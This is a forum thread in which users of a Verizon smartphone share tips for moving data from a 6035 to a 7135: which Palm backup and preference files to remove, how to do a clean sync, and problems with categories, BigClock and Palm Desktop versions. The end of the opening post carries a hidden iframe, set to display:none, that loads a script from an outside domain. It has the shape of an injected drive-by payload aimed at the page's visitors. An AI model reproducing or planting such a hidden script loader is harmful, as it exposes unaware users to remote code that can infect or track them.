+ Reply to Thread

Migrating from 6035 to 7135 - Gotchas?

My 7135 is now on it's way via FedEx (you gotta love that the Verizon Fullfillment Center is in Memphis), so I have a question for you current users.

Are there any gotchas moving from 6035 to 7135?

Kinda surprised there's not a thread on the subject already. If there is it's not in the FAQ. Pointers welcome if there is one.

Also interested in things to watch for from new features. One I've already heard is that MP3 files for the MP3 player must be on a memory card. Is that really the case?

I know there aren't many of you out there, but with Verizon finally taking the wraps off this fabulous device on 4/28/2003 I'm sure there will be lots of us who would really appreciate the experiences of those who have gone before us on this migration.

THANKS!!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator
    very simple to migrate...

you do not want to save any prefs from the 6035 over to the new phone. you need to delete the saved and unsaved prefs, the backup and archive folders. (or you could rename them) then generate the new folders with a virgin sync from the new device. this way you are sure to not get any old apps or legacy files onto the new device.

doing it any other way wont guarantee the device wont give you some trouble down the road...

From my experience, there really isn't much to detail about the migration. Its a surprisingly simple process.

1) Do a final hot sync on your 6035.

2) Load the new Palm Desktop from the CD provided with the phone.

3) Plug in your new hot sync cradle

4) Remove your Saved_Preferences.prc file from your Palm backup folder.

5) Create a custom hot sync that changes the conduits to Desktop overwrites handheld where available.

6) Complete a hot sync and reset your 7135 when prompted.

7) Check each of your apps to make sure that they work properly and that all registration codes are entered for apps that you purchased for your 6035 (many of mine didn't come over)

Browse through the Phone and PDA prefs looking for additional setups.

Other than that...not much to it.

Did I miss anything???

Make sure you don't sync your old NetworkDB.pdb either.

Administrator
    ^^^^^ yes especially if you are moving from one carrier to another!

MEL
    Got mine yesterday. The only sync issue (not a biggie) was that it took three or four syncs to get Outlook calendar entries entered beyond June 24 to the 7135.

General palm migration tip:

If you deleted some of the original AddrBook, DateBook, Memo, or ToDo categories and now have 15 of your own, make sure you delete the default categories on your new device before sync'ing. I didn't do that, and I lost some of my categories... those entries were put in Unfiled. It's because a max of 15 categories (other than Unfiled) is allowed. That's muy annoying! The PalmDesktop should have some kind of warning before it does this.

Folks,

I appreciate all the guidance. Basically, this is really similar to the migration process back when we moved for our Palms to the 6035. Same kinda gotchas.

THANKS!!

All my .pdbs etc ended up in a /backup file. How do I get those to come over? Do I create a custom conduit? Also, the sw seems to want to put some of these on a sim card which I don't think I have....

starting with fresh software on new phone

hey sorry guys i looked for this in the search and couldn't find the answers i was after. i'm a longtime 6035 user, and i'm upgrading to the 7135. i DON'T want to just sync the 7135 with the old data. i want to start fresh, erase everything from my pc and start with a brand new clean 7135, and install each program. what do i do on my pc to make this happen? delete the 'palm' folder? is that all there is to it?? thanks...c

Pretty much, especially if your not planning on using your old 6035. There is a newer version of the Palm desktop that comes on the 7135 CD. I've heard that other have downloaded the most recent Palm desktop from Palm's website and accomplished the same thing. I was upgrading from my old Visor Deluxe and that is what I did. My steps:
    1) Uninstall the Palm and any other PDA software from my PC. I wanted to make sure I removed any conduits as well.
    2) Loaded the Palm software from the 7135 CD.
    3) Reloaded all the apps I wanted to run with the my 7135 so that any conduits etc were reloaded
    4) I beamed my contacts from my old PDA to my 7135 only because I was too impatient to sync it when I first got my phone.

Once I had my 7135 setup again I setup my Visor to sync as a different name so I could use both devices if I needed. I'm sure others will elaborate on this process.
    mg

I THINK YOU COULD ALSO JUST MAKE A NEW USER NAME IN YOUR PLAM DESKTOP. THAT WAY IF YOU FIND SOMETHING YOU WANT ON YOUR 7135 AND HAD IT ON YOU 6035 YOU STILL HAVE IT. THE PALM DESKTOP WILL SEPERATE THE INFO BETWEEN USERS.

I had no problem just removing my savedpreferences file from the backup folder, and syncing. YMMV.
    Larry Ganz
    http://www.jesusreigns.org
    John 3:16

Originally posted by larryganz
    I had no problem just removing my savedpreferences file from the backup folder, and syncing. YMMV.
    Uhhh... he said "i DON'T want to just sync the 7135 with the old data. i want to start fresh, erase everything from my pc and start with a brand new clean 7135, and install each program."

-Quick

Administrator
    hey corb guy.. good to see you! and congrats on the new purchase!

all you need to do is rename or move your backup, archive folders to another location.. do a virgin sync to get new folders back, then you can beam over your contact book, addy, to do, etc.. the only thing that requires special attention is manually installing your 3rd party software.. its always best to do a clean install with applications so you KNOW the phone is clean and free of orphaned files... better piece of mind... :drink3

welcome to the 7135!

Migrating from 6035 to 7135

Well, I survived the Red Hot Chili Peppers concert last Thursday

Unfortunately, my 6035 did not (((

After trying to rescue my daughter from the mosh pit (security got her out), I pushed my way back only to find the pouch was still on my belt but the phone was gone. After the concert all we found was the keypad. Will give it a proper burial tomorrow.

Friday, went to the store to get a replacement. Downtown Vancouver store had a 7135 for CDN$1,300, or I could get a 6035 for CDN$1,400 (go figure).

After a few phone calls (pay phone - EWWWWW!) I found a store in the 'burbs had the 7135 for CDN$800. They even remembered me because I bought the 6035 there 1.5 years ago. Long story short, when I arrived they had the phone all set up, charged and ready to go. Great customer service!

Some of the issues I have so far are: (Yes, I read the instructions)

After installing the new desktop software and moving the saved_preferences file, I started the first hotsync at 2:30pm on Saturday. Checking remotely from home at 9:30pm revealed the process was still going. Cancelled and started over the next day. Still no luck; hotsync crashed again and again. Finally got it to work after setting the Network preferences back to the settings on the 6035 manually. Now hotsyncs fine. Interestingly, even though I have several conduits set to not update, they sync anyway.

All my categories for to do's and addresses have disappeared. I will have to go through the tedium of setting them up again.

Bigclock doesn't seem to work unless it is the active application and the flip is not closed. This could change in the future though; I had very erratic behaviour with Bigclock on the 6035. Once it settled down it seemed to work fine, but at first you could never be sure if the alarms would go off or not. One thing I noticed is that the screen displays black and white after Bigclock is run.

The only other thing I have noticed so far is that if you jolt the phone, for example by going down stairs too fast, the flip opens. This will take some getting used to.

As a lefty I really appreciate the left hand friendly placement of the stylus.

I still miss my 6035 but the 7135 so far is great
    Adrian Jacob, C.A.

Do yourself and your 7135 a favour by downloading the latest version of BigClock (v 2.83). This works much better on the 7135.

http://www.gacel.de

migrating 6135 to 7135

I am thinking of upgrading my trusty 6135 to a 7135. I noticed most of the posts about this but have further questions, at least about details. I am using it on my iBook with system 10.3 and Palm Desktop 4.0. No problems with it (some have had syncing problems with new 10.3 Panther but Palm Desktop has always been pretty stable for me for some reason). Anyway I notice the instructions for transfering old 6135 data and which files to remove. The more technical question comes with the Palm Desktop 4.1 software disk that comes with the new 7135. Do I need to install that new software? Or can I sync with the old Palm Desktop or does the disk that comes with the 7135 install some new prefs in my users folder???

Reason for asking is I have been so stable with my palm desktop and have read of problems when installing the new Palm Desktop 4.1 (especially with Panther OS 10.3 on macs) that I hate to mess up what works for me in syncing.

I am just exploring moving to a 7135 because of features and size and thus want to know that it will work. Otherwise I may hold off a bit if users have had problems.

Thanks much

Russ
    Russ Jacobson
    jacobson@isgs.uiuc.edu
    Dino Russ's Lair: htpp://www.isgs.uiuc.edu/dinos

Originally posted by eener
    2) Load the new Palm Desktop from the CD provided with the phone.
    Be absolutely, positively sure to do this step. I have a 7135, and my wife has a 6035, and she was getting "Unknown Format" errors when I beamed certain types of data to her (Address Book was one; I forget the others but there's a thread about it somewhere in this forum). She did two things, one of which fixed the problem. The first was a hard reset (not likely, since she'd done one before), and the second was to load Palm Desktop from my 7135 CD.

So to be safe, make sure you do this step!

Rob

link to a similar thread!!!

check out this thread....answers all questions..has good ideas...I just upgraded from 6035 to 7135....will do my first sync tonight....cross your fingers?!?!

http://www.smartphonesource.com/vbul...t=6035+restore

or search 6035 restore
    candleman